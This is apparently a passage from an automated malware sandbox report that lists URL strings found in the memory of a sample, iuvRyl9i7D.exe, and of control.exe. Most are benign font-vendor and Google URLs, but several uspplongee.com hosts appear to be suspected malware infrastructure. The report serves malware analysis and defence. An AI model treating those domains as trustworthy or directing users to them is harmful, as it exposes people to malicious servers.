00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.como
Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comsivao
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comtoedK
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251839011.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251710288.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251678493.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comueo
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn.
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn5
Source: iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.html
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/:
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/X:
Source: iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0(
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ana
Source: iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/n
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: iuvRyl9i7D.exe, 00000000.00000003.249572897.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249496103.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249374645.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249531399.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249615233.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249355892.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249593017.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249472996.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/xQ
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: iuvRyl9i7D.exe, 00000000.00000003.256184309.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.monotype.
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp4
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.uspplongee.com
Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.uspplongee.com/n6g4/
Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn)
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xingsen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://yihen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://yousu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://zhanzen.uspplongee.com/
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
